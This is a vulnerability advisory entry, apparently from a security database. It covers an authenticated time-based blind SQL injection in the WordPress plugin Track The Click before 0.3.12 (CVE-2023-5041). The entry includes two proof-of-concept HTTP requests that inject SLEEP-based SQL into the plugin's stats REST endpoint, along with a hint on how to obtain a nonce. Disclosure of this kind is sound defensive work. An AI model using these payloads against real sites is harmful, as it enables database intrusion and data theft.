Lucene search
Karolis NarvilasWPEX-ID:45194442-6EEA-4E07-85A5-4A1E2FDE3523HistorySep 26, 2023 - 12:00 a.m.
Track The Click < 0.3.12 - Author+ Time-Based Blind SQL Injection
2023-09-2600:00:00
Karolis Narvilas
42
track the click
sql injection
time-based
security exploit
wordpress
api
plugin
Description The plugin does not properly sanitize query parameters to the stats REST endpoint before using them in a database query, allowing a logged in user with an author role or higher to perform time based blind SQLi attacks on the database. Version 0.3.11 changes the API endpoint to only be accessible by administrators, and fixes some of the SQL injections, but not all.
GET /wp-json/track-the-click/v1/stats?start=20230825')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
GET /wp-json/track-the-click/v1/stats?link=1')+AND+(SELECT+1+FROM+(SELECT(SLEEP(12)))l)+AND+('1'%3d'1start=20230825&end=20230901&group=link&group_time=day HTTP/1.1
Host: example.com
X-WP-Nonce: [Nonce]
Cookie: [Author+]
Get a valid nonce from "/wp-admin/admin-ajax.php?action=rest-nonce"Related
wpvulndb
wpvulndb
Track The Click < 0.3.12 - Author+ Time-Based Blind SQL Injection
2023-09-26 00:00:00
prion
prion
Design/Logic Flaw
2024-01-17 15:15:00
cvelist
cvelist
nvd
nvd
CVE-2023-5041
2024-01-17 15:15:10
cve
cve
CVE-2023-5041
2024-01-17 15:15:10
wordfence
wordfence
7.1 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
19.3%
Related for WPEX-ID:45194442-6EEA-4E07-85A5-4A1E2FDE3523